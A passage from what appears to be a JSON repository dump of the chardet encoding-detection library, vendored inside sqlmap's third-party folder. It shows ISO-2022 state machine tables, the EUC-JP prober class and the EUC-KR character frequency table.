28-2f\n)\n\nHZ_CHAR_LEN_TABLE = (0, 0, 0, 0, 0, 0)\n\nHZ_SM_MODEL = {'class_table': HZ_CLS,\n               'class_factor': 6,\n               'state_table': HZ_ST,\n               'char_len_table': HZ_CHAR_LEN_TABLE,\n               'name': \"HZ-GB-2312\",\n               'language': 'Chinese'}\n\nISO2022CN_CLS = (\n2,0,0,0,0,0,0,0,  # 00 - 07\n0,0,0,0,0,0,0,0,  # 08 - 0f\n0,0,0,0,0,0,0,0,  # 10 - 17\n0,0,0,1,0,0,0,0,  # 18 - 1f\n0,0,0,0,0,0,0,0,  # 20 - 27\n0,3,0,0,0,0,0,0,  # 28 - 2f\n0,0,0,0,0,0,0,0,  # 30 - 37\n0,0,0,0,0,0,0,0,  # 38 - 3f\n0,0,0,4,0,0,0,0,  # 40 - 47\n0,0,0,0,0,0,0,0,  # 48 - 4f\n0,0,0,0,0,0,0,0,  # 50 - 57\n0,0,0,0,0,0,0,0,  # 58 - 5f\n0,0,0,0,0,0,0,0,  # 60 - 67\n0,0,0,0,0,0,0,0,  # 68 - 6f\n0,0,0,0,0,0,0,0,  # 70 - 77\n0,0,0,0,0,0,0,0,  # 78 - 7f\n2,2,2,2,2,2,2,2,  # 80 - 87\n2,2,2,2,2,2,2,2,  # 88 - 8f\n2,2,2,2,2,2,2,2,  # 90 - 97\n2,2,2,2,2,2,2,2,  # 98 - 9f\n2,2,2,2,2,2,2,2,  # a0 - a7\n2,2,2,2,2,2,2,2,  # a8 - af\n2,2,2,2,2,2,2,2,  # b0 - b7\n2,2,2,2,2,2,2,2,  # b8 - bf\n2,2,2,2,2,2,2,2,  # c0 - c7\n2,2,2,2,2,2,2,2,  # c8 - cf\n2,2,2,2,2,2,2,2,  # d0 - d7\n2,2,2,2,2,2,2,2,  # d8 - df\n2,2,2,2,2,2,2,2,  # e0 - e7\n2,2,2,2,2,2,2,2,  # e8 - ef\n2,2,2,2,2,2,2,2,  # f0 - f7\n2,2,2,2,2,2,2,2,  # f8 - ff\n)\n\nISO2022CN_ST = (\nMachineState.START,     3,MachineState.ERROR,MachineState.START,MachineState.START,MachineState.START,MachineState.START,MachineState.START,# 00-07\nMachineState.START,MachineState.ERROR,MachineState.ERROR,MachineState.ERROR,MachineState.ERROR,MachineState.ERROR,MachineState.ERROR,MachineState.ERROR,# 08-0f\nMachineState.ERROR,MachineState.ERROR,MachineState.ITS_ME,MachineState.ITS_ME,MachineState.ITS_ME,MachineState.ITS_ME,MachineState.ITS_ME,MachineState.ITS_ME,# 10-17\nMachineState.ITS_ME,MachineState.ITS_ME,MachineState.ITS_ME,MachineState.ERROR,MachineState.ERROR,MachineState.ERROR,     4,MachineState.ERROR,# 18-1f\nMachineState.ERROR,MachineState.ERROR,MachineState.ERROR,MachineState.ITS_ME,MachineState.ERROR,MachineState.ERROR,MachineState.ERROR,MachineState.ERROR,# 20-27\n     5,     6,MachineState.ERROR,MachineState.ERROR,MachineState.ERROR,MachineState.ERROR,MachineState.ERROR,MachineState.ERROR,# 28-2f\nMachineState.ERROR,MachineState.ERROR,MachineState.ERROR,MachineState.ITS_ME,MachineState.ERROR,MachineState.ERROR,MachineState.ERROR,MachineState.ERROR,# 30-37\nMachineState.ERROR,MachineState.ERROR,MachineState.ERROR,MachineState.ERROR,MachineState.ERROR,MachineState.ITS_ME,MachineState.ERROR,MachineState.START,# 38-3f\n)\n\nISO2022CN_CHAR_LEN_TABLE = (0, 0, 0, 0, 0, 0, 0, 0, 0)\n\nISO2022CN_SM_MODEL = {'class_table': ISO2022CN_CLS,\n                      'class_factor': 9,\n                      'state_table': ISO2022CN_ST,\n                      'char_len_table': ISO2022CN_CHAR_LEN_TABLE,\n                      'name': \"ISO-2022-CN\",\n                      'language': 'Chinese'}\n\nISO2022JP_CLS = (\n2,0,0,0,0,0,0,0,  # 00 - 07\n0,0,0,0,0,0,2,2,  # 08 - 0f\n0,0,0,0,0,0,0,0,  # 10 - 17\n0,0,0,1,0,0,0,0,  # 18 - 1f\n0,0,0,0,7,0,0,0,  # 20 - 27\n3,0,0,0,0,0,0,0,  # 28 - 2f\n0,0,0,0,0,0,0,0,  # 30 - 37\n0,0,0,0,0,0,0,0,  # 38 - 3f\n6,0,4,0,8,0,0,0,  # 40 - 47\n0,9,5,0,0,0,0,0,  # 48 - 4f\n0,0,0,0,0,0,0,0,  # 50 - 57\n0,0,0,0,0,0,0,0,  # 58 - 5f\n0,0,0,0,0,0,0,0,  # 60 - 67\n0,0,0,0,0,0,0,0,  # 68 - 6f\n0,0,0,0,0,0,0,0,  # 70 - 77\n0,0,0,0,0,0,0,0,  # 78 - 7f\n2,2,2,2,2,2,2,2,  # 80 - 87\n2,2,2,2,2,2,2,2,  # 88 - 8f\n2,2,2,2,2,2,2,2,  # 90 - 97\n2,2,2,2,2,2,2,2,  # 98 - 9f\n2,2,2,2,2,2,2,2,  # a0 - a7\n2,2,2,2,2,2,2,2,  # a8 - af\n2,2,2,2,2,2,2,2,  # b0 - b7\n2,2,2,2,2,2,2,2,  # b8 - bf\n2,2,2,2,2,2,2,2,  # c0 - c7\n2,2,2,2,2,2,2,2,  # c8 - cf\n2,2,2,2,2,2,2,2,  # d0 - d7\n2,2,2,2,2,2,2,2,  # d8 - df\n2,2,2,2,2,2,2,2,  # e0 - e7\n2,2,2,2,2,2,2,2,  # e8 - ef\n2,2,2,2,2,2,2,2,  # f0 - f7\n2,2,2,2,2,2,2,2,  # f8 - ff\n)\n\nISO2022JP_ST = (\nMachineState.START,     3,MachineState.ERROR,MachineState.START,MachineState.START,MachineState.START,MachineState.START,MachineState.START,# 00-07\nMachineState.START,MachineState.START,MachineState.ERROR,MachineState.ERROR,MachineState.ERROR,MachineState.ERROR,MachineState.ERROR,MachineState.ERROR,# 08-0f\nMachineState.ERROR,MachineState.ERROR,MachineState.ERROR,MachineState.ERROR,MachineState.ITS_ME,MachineState.ITS_ME,MachineState.ITS_ME,MachineState.ITS_ME,# 10-17\nMachineState.ITS_ME,MachineState.ITS_ME,MachineState.ITS_ME,MachineState.ITS_ME,MachineState.ITS_ME,MachineState.ITS_ME,MachineState.ERROR,MachineState.ERROR,# 18-1f\nMachineState.ERROR,     5,MachineState.ERROR,MachineState.ERROR,MachineState.ERROR,     4,MachineState.ERROR,MachineState.ERROR,# 20-27\nMachineState.ERROR,MachineState.ERROR,MachineState.ERROR,     6,MachineState.ITS_ME,MachineState.ERROR,MachineState.ITS_ME,MachineState.ERROR,# 28-2f\nMachineState.ERROR,MachineState.ERROR,MachineState.ERROR,MachineState.ERROR,MachineState.ERROR,MachineState.ERROR,MachineState.ITS_ME,MachineState.ITS_ME,# 30-37\nMachineState.ERROR,MachineState.ERROR,MachineState.ERROR,MachineState.ITS_ME,MachineState.ERROR,MachineState.ERROR,MachineState.ERROR,MachineState.ERROR,# 38-3f\nMachineState.ERROR,MachineState.ERROR,MachineState.ERROR,MachineState.ERROR,MachineState.ITS_ME,MachineState.ERROR,MachineState.START,MachineState.START,# 40-47\n)\n\nISO2022JP_CHAR_LEN_TABLE = (0, 0, 0, 0, 0, 0, 0, 0, 0, 0)\n\nISO2022JP_SM_MODEL = {'class_table': ISO2022JP_CLS,\n                      'class_factor': 10,\n                      'state_table': ISO2022JP_ST,\n                      'char_len_table': ISO2022JP_CHAR_LEN_TABLE,\n                      'name': \"ISO-2022-JP\",\n                      'language': 'Japanese'}\n\nISO2022KR_CLS = (\n2,0,0,0,0,0,0,0,  # 00 - 07\n0,0,0,0,0,0,0,0,  # 08 - 0f\n0,0,0,0,0,0,0,0,  # 10 - 17\n0,0,0,1,0,0,0,0,  # 18 - 1f\n0,0,0,0,3,0,0,0,  # 20 - 27\n0,4,0,0,0,0,0,0,  # 28 - 2f\n0,0,0,0,0,0,0,0,  # 30 - 37\n0,0,0,0,0,0,0,0,  # 38 - 3f\n0,0,0,5,0,0,0,0,  # 40 - 47\n0,0,0,0,0,0,0,0,  # 48 - 4f\n0,0,0,0,0,0,0,0,  # 50 - 57\n0,0,0,0,0,0,0,0,  # 58 - 5f\n0,0,0,0,0,0,0,0,  # 60 - 67\n0,0,0,0,0,0,0,0,  # 68 - 6f\n0,0,0,0,0,0,0,0,  # 70 - 77\n0,0,0,0,0,0,0,0,  # 78 - 7f\n2,2,2,2,2,2,2,2,  # 80 - 87\n2,2,2,2,2,2,2,2,  # 88 - 8f\n2,2,2,2,2,2,2,2,  # 90 - 97\n2,2,2,2,2,2,2,2,  # 98 - 9f\n2,2,2,2,2,2,2,2,  # a0 - a7\n2,2,2,2,2,2,2,2,  # a8 - af\n2,2,2,2,2,2,2,2,  # b0 - b7\n2,2,2,2,2,2,2,2,  # b8 - bf\n2,2,2,2,2,2,2,2,  # c0 - c7\n2,2,2,2,2,2,2,2,  # c8 - cf\n2,2,2,2,2,2,2,2,  # d0 - d7\n2,2,2,2,2,2,2,2,  # d8 - df\n2,2,2,2,2,2,2,2,  # e0 - e7\n2,2,2,2,2,2,2,2,  # e8 - ef\n2,2,2,2,2,2,2,2,  # f0 - f7\n2,2,2,2,2,2,2,2,  # f8 - ff\n)\n\nISO2022KR_ST = (\nMachineState.START,     3,MachineState.ERROR,MachineState.START,MachineState.START,MachineState.START,MachineState.ERROR,MachineState.ERROR,# 00-07\nMachineState.ERROR,MachineState.ERROR,MachineState.ERROR,MachineState.ERROR,MachineState.ITS_ME,MachineState.ITS_ME,MachineState.ITS_ME,MachineState.ITS_ME,# 08-0f\nMachineState.ITS_ME,MachineState.ITS_ME,MachineState.ERROR,MachineState.ERROR,MachineState.ERROR,     4,MachineState.ERROR,MachineState.ERROR,# 10-17\nMachineState.ERROR,MachineState.ERROR,MachineState.ERROR,MachineState.ERROR,     5,MachineState.ERROR,MachineState.ERROR,MachineState.ERROR,# 18-1f\nMachineState.ERROR,MachineState.ERROR,MachineState.ERROR,MachineState.ITS_ME,MachineState.START,MachineState.START,MachineState.START,MachineState.START,# 20-27\n)\n\nISO2022KR_CHAR_LEN_TABLE = (0, 0, 0, 0, 0, 0)\n\nISO2022KR_SM_MODEL = {'class_table': ISO2022KR_CLS,\n                      'class_factor': 6,\n                      'state_table': ISO2022KR_ST,\n                      'char_len_table': ISO2022KR_CHAR_LEN_TABLE,\n                      'name': \"ISO-2022-KR\",\n                      'language': 'Korean'}\n\n\n"
  },
  {
    "path": "sqlmap/thirdparty/chardet/eucjpprober.py",
    "content": "######################## BEGIN LICENSE BLOCK ########################\n# The Original Code is mozilla.org code.\n#\n# The Initial Developer of the Original Code is\n# Netscape Communications Corporation.\n# Portions created by the Initial Developer are Copyright (C) 1998\n# the Initial Developer. All Rights Reserved.\n#\n# Contributor(s):\n#   Mark Pilgrim - port to Python\n#\n# This library is free software; you can redistribute it and/or\n# modify it under the terms of the GNU Lesser General Public\n# License as published by the Free Software Foundation; either\n# version 2.1 of the License, or (at your option) any later version.\n#\n# This library is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU\n# Lesser General Public License for more details.\n#\n# You should have received a copy of the GNU Lesser General Public\n# License along with this library; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA\n# 02110-1301  USA\n######################### END LICENSE BLOCK #########################\n\nfrom .enums import ProbingState, MachineState\nfrom .mbcharsetprober import MultiByteCharSetProber\nfrom .codingstatemachine import CodingStateMachine\nfrom .chardistribution import EUCJPDistributionAnalysis\nfrom .jpcntx import EUCJPContextAnalysis\nfrom .mbcssm import EUCJP_SM_MODEL\n\n\nclass EUCJPProber(MultiByteCharSetProber):\n    def __init__(self):\n        super(EUCJPProber, self).__init__()\n        self.coding_sm = CodingStateMachine(EUCJP_SM_MODEL)\n        self.distribution_analyzer = EUCJPDistributionAnalysis()\n        self.context_analyzer = EUCJPContextAnalysis()\n        self.reset()\n\n    def reset(self):\n        super(EUCJPProber, self).reset()\n        self.context_analyzer.reset()\n\n    @property\n    def charset_name(self):\n        return \"EUC-JP\"\n\n    @property\n    def language(self):\n        return \"Japanese\"\n\n    def feed(self, byte_str):\n        for i in range(len(byte_str)):\n            # PY3K: byte_str is a byte array, so byte_str[i] is an int, not a byte\n            coding_state = self.coding_sm.next_state(byte_str[i])\n            if coding_state == MachineState.ERROR:\n                self.logger.debug('%s %s prober hit error at byte %s',\n                                  self.charset_name, self.language, i)\n                self._state = ProbingState.NOT_ME\n                break\n            elif coding_state == MachineState.ITS_ME:\n                self._state = ProbingState.FOUND_IT\n                break\n            elif coding_state == MachineState.START:\n                char_len = self.coding_sm.get_current_charlen()\n                if i == 0:\n                    self._last_char[1] = byte_str[0]\n                    self.context_analyzer.feed(self._last_char, char_len)\n                    self.distribution_analyzer.feed(self._last_char, char_len)\n                else:\n                    self.context_analyzer.feed(byte_str[i - 1:i + 1],\n                                                char_len)\n                    self.distribution_analyzer.feed(byte_str[i - 1:i + 1],\n                                                     char_len)\n\n        self._last_char[0] = byte_str[-1]\n\n        if self.state == ProbingState.DETECTING:\n            if (self.context_analyzer.got_enough_data() and\n               (self.get_confidence() > self.SHORTCUT_THRESHOLD)):\n                self._state = ProbingState.FOUND_IT\n\n        return self.state\n\n    def get_confidence(self):\n        context_conf = self.context_analyzer.get_confidence()\n        distrib_conf = self.distribution_analyzer.get_confidence()\n        return max(context_conf, distrib_conf)\n"
  },
  {
    "path": "sqlmap/thirdparty/chardet/euckrfreq.py",
    "content": "######################## BEGIN LICENSE BLOCK ########################\n# The Original Code is Mozilla Communicator client code.\n#\n# The Initial Developer of the Original Code is\n# Netscape Communications Corporation.\n# Portions created by the Initial Developer are Copyright (C) 1998\n# the Initial Developer. All Rights Reserved.\n#\n# Contributor(s):\n#   Mark Pilgrim - port to Python\n#\n# This library is free software; you can redistribute it and/or\n# modify it under the terms of the GNU Lesser General Public\n# License as published by the Free Software Foundation; either\n# version 2.1 of the License, or (at your option) any later version.\n#\n# This library is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU\n# Lesser General Public License for more details.\n#\n# You should have received a copy of the GNU Lesser General Public\n# License along with this library; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA\n# 02110-1301  USA\n######################### END LICENSE BLOCK #########################\n\n# Sampling from about 20M text materials include literature and computer technology\n\n# 128  --> 0.79\n# 256  --> 0.92\n# 512  --> 0.986\n# 1024 --> 0.99944\n# 2048 --> 0.99999\n#\n# Idea Distribution Ratio = 0.98653 / (1-0.98653) = 73.24\n# Random Distribution Ration = 512 / (2350-512) = 0.279.\n#\n# Typical Distribution Ratio\n\nEUCKR_TYPICAL_DISTRIBUTION_RATIO = 6.0\n\nEUCKR_TABLE_SIZE = 2352\n\n# Char to FreqOrder table ,\nEUCKR_CHAR_TO_FREQ_ORDER = (\n  13, 130, 120,1396, 481,1719,1720, 328, 609, 212,1721, 707, 400, 299,1722,  87,\n1397,1723, 104, 536,1117,1203,1724,1267, 685,1268, 508,1725,1726,1727,1728,1398,\n1399,1729,1730,1731, 141, 621, 326,1057, 368,1732, 267, 488,  20,1733,1269,1734,\n 945,1400,1735,  47, 904,1270,1736,1737, 773, 248,1738, 409, 313, 786, 429,1739,\n 116, 987, 813,1401, 683,  75,1204, 145,1740,1741,1742,1743,  16, 847, 667, 622,\n 708,1744,1745,1746, 966, 787, 304, 129,1747,  60, 820, 123, 676,1748,1749,1750,\n1751, 617,1752, 626,1753,1754,1755,1756, 653,1757,1758,1759,1760,1761,1762, 856,\n 344,1763,1764,1765,1766,  89, 401, 418, 806, 905, 848,1767,1768,1769, 946,1205,\n 709,1770,1118,1771, 241,1772,1773,1774,1271,1775, 569,1776, 999,1777,1778,1779,\n1780, 337, 751,1058,  28, 628, 254,1781, 177, 906, 270, 349, 891,1079,1782,  19,\n1783, 379,1784, 315,1785, 629, 754,1402, 559,1786, 636, 203,1206,1787, 710, 567,\n1788, 935, 814,1789,1790,1207, 766, 528,1791,1792,1208,1793,1794,1795,1796,1797,\n1403,1798,1799, 533,1059,1404,1405,1156,1406, 936, 884,1080,1800, 351,1801,1802,\n1803,1804,1805, 801,1806,1807,1808,1119,1809,1157, 714, 474,1407,1810, 298, 899,\n 885,1811,1120, 802,1158,1812, 892,1813,1814,1408, 659,1815,1816,1121,1817,1818,\n1819,1820,1821,1822, 319,1823, 594, 545,1824, 815, 937,1209,1825,1826, 573,1409,\n1022,1827,1210,1828,1829,1830,1831,1832,1833, 556, 722, 807,1122,1060,1834, 697,\n1835, 900, 557, 715,1836,1410, 540,1411, 752,1159, 294, 597,1211, 976, 803, 770,\n1412,1837,1838,  39, 794,1413, 358,1839, 371, 925,1840, 453, 661, 788, 531, 723,\n 544,1023,1081, 869,  91,1841, 392, 430, 790, 602,1414, 677,1082, 457,1415,1416,\n1842,1843, 475, 327,1024,1417, 795, 121,1844, 733, 403,1418,1845,1846,1847, 300,\n 119, 711,1212, 627,1848,1272, 207,1849,1850, 796,1213, 382,1851, 519,1852,1083,\n 893,1853,1854,1855, 367, 809, 487, 671,1856, 663,1857,1858, 956, 471, 306, 857,\n1859,1860,1160,1084,1861,1862,1863,1864,1865,1061,1866,1867,1868,1869,1870,1871,\n 282,  96, 574,1872, 502,1085,1873,1214,1874, 907,1875,1876, 827, 977,1419,1420,\n1421, 268,1877,1422,1878,1879,1880, 308,1881,   2, 537,1882,1883,1215,1884,1885,\n 127, 791,1886,1273,1423,1887,  34, 336, 404, 643,1888, 571, 654, 894, 840,1889,\n   0, 886,1274, 122, 575, 260, 908, 938,1890,1275, 410, 316,1891,1892, 100,1893,\n1894,1123,  48,1161,1124,1025,1895, 633, 901,1276,1896,1897, 115, 816,1898, 317,\n1899, 694,1900, 909, 734,1424, 572, 866,1425, 691,  85, 524,1010, 543, 394, 841,\n1901,1902,1903,1026,1904,1905,1906,1907,1908,1909,  30, 451, 651, 988, 310,1910,\n1911,1426, 810,1216,  93,1912,1913,1277,1217,1914, 858, 759,  45,  58, 181, 610,\n 269,1915,1916, 131,1062, 551, 443,1000, 821,1427, 957, 895,1086,1917,1918, 375,\n1919, 359,1920, 687,1921, 822,1922, 293,1923,1924,  40, 662, 118, 692,  29, 939,\n 887, 640, 482, 174,1925,  69,1162, 728,1428, 910,1926,1278,1218,1279, 386, 870,\n 217, 854,1163, 823,1927,1928,1929,1930, 834,1931,  78,1932, 859,1933,1063,1934,\n1935,1936,1937, 438,1164, 208, 595,1938,1939,1940,1941,1219,1125,1942, 280, 888,\n1429,1430,1220,1431,1943,1944,1945,1946,1947,1280, 150, 510,1432,1948,1949,1950,\n1951,1952,1953,1954,1011,1087,1955,1433,1043,1956, 881,1957, 614, 958,1064,1065,\n1221,1958, 638,1001, 860, 967, 896,1434, 989, 492, 553,1281,1165,1959,1282,1002,\n1283,1222,1960,1961,1962,1963,  36, 383, 228, 753, 247, 454,1964, 876, 678,1965,\n1966,1284, 126, 464, 490, 835, 136, 672, 529, 940,1088,1435, 473,1967,1968, 467,\n  50, 390, 227, 587, 279, 378, 598, 792, 968, 240, 151, 160, 849, 882,1126,1285,\n 639,1044, 133, 140, 288, 360, 811, 563,1027, 561, 142, 523,1969,1970,1971,   7,\n 103, 296, 439, 407, 506, 634, 990,1972,1973,1974,1975, 645,1976,1977,1978,1979,\n1980,1981, 236,1982,1436,1983,1984,1089, 192, 828, 618, 518,1166, 333,1127,1985,\n 818,1223,1986,1987,1988,1989,1990,1991,1992,1993, 342,1128,1286, 746, 842,1994,\n1995, 560, 223,1287,  98,   8, 189, 650, 978,1288,1996,1437,1997,  17, 345, 250,\n 423, 277, 234, 512, 226,  97, 289,  42, 167,1998, 201,1999,2000, 843, 836, 824,\n 532, 338, 783,1090, 182, 576, 436,1438,1439, 527, 500,2001, 947, 889,2002,2003,\n2004,2005, 262, 600, 314, 447,2006, 547,2007, 693, 738,1129,2008,  71,1440, 745,\n 619, 688,2009, 829,2010,2011, 147,2012,  33, 948,2013,2014,  74, 224,2015,  61,\n 191, 918, 399, 637,2016,1028,1130, 257, 902,2017,2018,2019,2020,2021,2022,2023,\n2024,2025,2026, 837,2027,2028,2029,2030, 179, 874, 591,  52, 724, 246,2031,2032,\n2033,2034,1167, 969,2035,1289, 630, 605, 911,1091,1168,2036,2037,2038,1441, 912,\n2039, 623,2040,2041, 253,1169,1290,2042,1442, 146, 620, 611, 577, 433,2043,1224,\n 719,1170, 959, 440, 437, 534,  84, 388, 480,1131, 159, 220, 198, 679,2044,1012,\n 819,1066,1443, 113,1225, 194, 318,1003,1029,2045,2046,2047,2048,1067,2049,2050,\n2051,2052,2053,  59, 913, 112,2054, 632,2055, 455, 144, 739,1291,2056, 273, 681,\n 499,2057, 448,2058,2059, 760,2060,2061, 970, 384, 169, 245,1132,2062,2063, 414,\n1444,2064,2065,  41, 235,2066, 157, 252, 877, 568, 919, 789, 580,2067, 725,2068,\n2069,1292,2070,2071,1445,2072,1446,2073,2074,  55, 588,  66,1447, 271,1092,2075,\n1226,2076, 960,1013, 372,2077,2078,2079,2080,2081,1293,2082,2083,2084,2085, 850,\n2086,2087,2088,2089,2090, 186,2091,1068, 180,2092,2093,2094, 109,1227, 522, 606,\n2095, 867,1448,1093, 991,1171, 926, 353,1133,2096, 581,2097,2098,2099,1294,1449,\n1450,2100, 596,1172,1014,1228,2101,1451,1295,1173,1229,2102,2103,1296,1134,1452,\n 949,1135,2104,2105,1094,1453,1454,1455,2106,1095,2107,2108,2109,2110,2111,2112,\n2113,2114,2115,2116,2117, 804,2118,2119,1230,1231, 805,1456, 405,1136,2120,2121,\n2122,2123,2124, 720, 701,1297, 992,1457, 927,1004,2125,2126,2127,2128,2129,2130,\n  22, 417,2131, 303,2132, 385,2133, 971, 520, 513,2134,1174,  73,1096, 231, 274,\n 962,1458, 673,2135,1459,2136, 152,1137,2137,2138,2139,2140,1005,1138,1460,1139,\n2141,2142,2143,2144,  11, 374, 844,2145, 154,1232,  46,1461,2146, 838, 830, 721,\n1233, 106,2147,  90, 428, 462, 578, 566,1175, 352,2148,2149, 538,1234, 124,1298,\n2150,1462, 761, 565,2151, 686,2152, 649,2153,  72, 173,2154, 460, 415,2155,1463,\n2156,1235, 305,2157,2158,2159,2160,2161,2162, 579,2163,2164,2165,2166,2167, 747,\n2168,2169,2170,2171,1464, 669,2172,2173,2174,2175,2176,1465,2177,  23, 530, 285,\n2178, 335, 729,2179, 397,2180,2181,2182,1030,2183,2184, 698,2185,2186, 325,2187,\n2188, 369,2189, 799,1097,1015, 348,2190,1069, 680,2191, 851,1466,2192,2193,  10,\n2194, 613, 424,2195, 979, 108, 449, 589,  27, 172,  81,1031,  80, 774, 281, 350,\n1032, 525, 301, 582,1176,2196, 674,1045,2197,2198,1467, 730, 762,2199,2200,2201,\n2202,1468,2203, 993,2204,2205, 266,1070, 963,1140,2206,2207,2208, 664,1098, 972,\n2209,2210,2211,1177,1469,1470, 871,2212,2213,2214,2215,2216,1471,2217,2218,2219,\n2220,2221,2222,2223,2224,2225,2226,2227,1472,1236,2228,2229,2230,2231,2232,2233,\n2234,2235,1299,2236,2237, 200,2238, 477, 373,2239,2240, 731, 825, 777,2241,2242,\n2243, 521, 486, 548,2244,2245,2246,1473,1300,  53, 549, 137, 875,  76, 158,2247,\n1301,1474, 469, 396,1016, 278, 712,2248, 321, 442, 503, 767, 744, 941,1237,1178,\n1475,2249,  82, 178,1141,1179, 973,2250,1302,2251, 297,2252,2253, 570,2254,2255,\n2256,  18, 450, 206,2257, 290, 292,1142,2258, 511, 162,  99, 346, 164, 735,2259,\n1476,1477,   4, 554, 343, 798,1099,2260,1100,2261,  43, 171,1303, 139, 215,2262,\n2263, 717, 775,2264,1033, 322, 216,2265, 831,2266, 149,2267,1304,2268,2269, 702,\n1238, 135, 845, 347, 309,2270, 484,2271, 878, 655, 238,1006,1478,2272,  67,2273,\n 295,2274,2275, 461,2276, 478, 942, 412,2277,1034,2278,2279,2280, 265,2281, 541,\n2282,2283,2284,2285,2286,  70, 852,1071,2287,2288,2289,2290,  21,  56, 509, 117,\n 432,2291,2292, 331, 980, 552,1101, 148, 284, 105, 393,1180,1239, 755,2293, 187,\n2294,1046,1479,2295, 340,2296,  63,1047, 230,2297,2298,1305, 763,1306, 101, 800,\n 808, 494,2299,2300,2301, 903,2302,  37,1072,  14,   5,2303,  79, 675,2304, 312,\n2305,2306,2307,2308,2309,1480,   6,1307,2310,2311,2312,   1, 470,  35,  24, 229,\n2313, 695, 210,  86, 778,  15, 784, 592, 779,  32,  77, 855, 964,2314, 259,2315,\n 501, 380,2316,2317,  83, 981, 153, 689,1308,1481,1482,1483,2318,2319, 716,1484,\n2320,2321,2322,2323,2324,2325,1485,2326,2327, 128,  57,  68, 261,1048, 211, 170,\n1240,  31,2328,  51, 435, 742,2329,2330,2331, 635,2332, 264, 456,2333,2334,2335,\n 425,2336,1486, 143, 507, 263, 943,2337, 363, 920,1487, 256,1488,1102, 243, 601,\n1489,2338,2339,2340,2341,2342,2343,2344, 861,2345,2346,2347,2348,2349,2350, 395,\n2351,1490,1491,  62, 535, 166, 225,2352,2353, 668, 419,1241, 138, 604, 928,2354,\n1181,2355,1492,1493,2356,2357,2358,1143,2359, 696,2360, 387, 307,1309, 682, 476,\n2361,2362, 332,  12, 222, 156,2363, 232,2364, 641, 276, 656, 517,1494,1495,1035,\n 416, 736,1496,2365,1017, 586,2366,2367,2368,1497,2369, 242,2370,2371,2372,1498,\n2373, 965, 713,2374,2375,2376,2377, 740, 982,1499, 944,1500,1007,2378,2379,1310,\n1501,2380,2381,2382, 785, 329,2383,2384,1502,2385,2386,2387, 932,2388,1503,2389,\n2390,2391,2392,1242,2393,2394,2395,2396,2397, 994, 950,2398,2399,2400,2401,1504,\n1311,2402,2403,2404,2405,1049, 749,2406,2407, 853, 718,1144,1312,2408,1182,1505,\n2409,2410, 255, 516, 479, 564, 550, 214,1506,1507,1313, 413, 239, 444, 339,1145,\n1036,1508,1509,1314,1037,1510,1315,2411,1511,2412,2413,2414, 176, 703, 497, 624,\n 593, 921, 302,2415, 341, 165,1103,1512,2416,1513,2417,2418,2419, 376,2420, 700,\n2421,2422,2423, 258, 768,1316,2424,1183,2425, 995, 608,2426,2427,2428,2429, 221,\n2430,2431,2432,2433,2434,2435,2436,2437, 195, 323, 726, 188, 897, 983,1317, 377,\n 644,1050, 879,2438, 452,2439,2440,2441,2442,2443,2444, 914,2445,2446,2447,2448,\n 915, 489,2449,1514,1184,2450,2451, 515,  64, 427, 495,2452, 583,2453, 483, 485,\n1038, 562, 213,1515, 748, 666,2454,2455,2456,2457, 334,2458, 780, 996,1008, 705,\n1243,2459,2460,2461,2462,2463, 114,2464, 493,1146, 366, 163,1516, 961,1104,2465,\n 291,2466,1318,1105,2467,1517, 365,2468, 355, 951,1244,2469,1319,2470, 631,2471,\n2472, 218,1320, 364, 320, 756,1518,1519,1321,1520,1322,2473,2474,2475,2476, 997,\n2477,2478,2479,2480, 665,1185,2481, 916,1521,2482,2483,2484, 584, 684,2485,2486,\n 797,2487,1051,1186,2488,2489,2490,1522,2491,2492, 370,2493,1039,1187,  65,2494,\n 434, 205, 463,1188,2495, 125, 812, 391, 402, 826, 699, 286, 398, 155, 781, 771,\n 585,2496, 590, 505,1073,2497, 599, 244, 219, 917,1018, 952, 646,1523,2498,1323,\n2499,2500,  49, 984, 354, 741,2501, 625,2502,1324,2503,1019, 190, 357, 757, 491,\n  95, 782, 868,2504,2505,2506,2507,2508,2509, 134,1524,1074, 422,1525, 898,2510,\n 161,2511,2512,2513,2514, 769,2515,1526,2516,2517, 411,1325,2518, 472,1527,2519,\n2520,2521,2522,2523,2524, 985,2525,2526,2527,2528,2529,2530, 764,2531,1245,2532,\n2533,  25, 204, 311,2534, 496,2535,1052,2536,2537,2538,2539,2540,2541,2542, 199,\n 704, 504, 468, 758, 657,1528, 196,  44, 839,1246, 272, 750,2543, 765, 862,2544,\n2545,1326,2546, 132, 615, 933,2547, 732,2548,2549,2550,1189,1529,2551, 283,1247,\n1053, 607, 929,2552,2553,2554, 930, 183, 872, 616,1040,1147,2555,1148,1020, 441,\n 249,1075,2556,2557,2558, 466, 743,2559,2560,2561,  92, 514, 426, 420, 526,2562,\n2563,2564,2565,2566,2567,2568, 185,2569,2570,2571,2572, 776,1530, 658,2573, 362,\n2574, 361, 922,1076, 793,2575,2576,2577,2578,2579,2580,1531, 251,2581,2582,2583,\n2584,1532,  54, 612, 237,1327,2585,2586, 275, 408, 647, 111,2587,1533,1106, 465,\n   3, 458,   9,  38,2588, 107, 110, 890, 209,  26, 737, 498,2589,1534,2590, 431,\n 202,  88,1535, 356, 287,1107, 660,1149,2591, 381,1536, 986,1150, 445,1248,1151,\n 974,2592,2593, 846,2594, 446, 953, 184,1249,1250, 727,2595, 923, 193, 883,2596,\n2597,2598, 102, 324, 539, 817,2599, 421,1041,2600, 832,2601,  94, 175, 197, 406,\n2602, 459,2603,2604,2605,2606,2607, 330, 555,2608,2609,2610, 706,1108, 389,2611,\n2612,2613,2614, 233,2615, 833, 558, 931, 954,1251,2616,2617,1537, 546,2618,2619,\n1009,2620,2621,2622,1538, 690,1328,2623, 955,2624,1539,2625,2626, 772,2627,2628,\n2629,2630,2631, 924, 648, 863, 603,2632,2633, 934,1540, 864, 865,2634, 642,1042,\n 670,1190,2635,2636,2637,2638, 168,2639, 652, 873, 542,1054,1541,2640,2641,2642,  # 512, 256\n)\n\n"
  },
  {
    "path": "sqlmap/thirdparty/chardet/euckrprober.py",
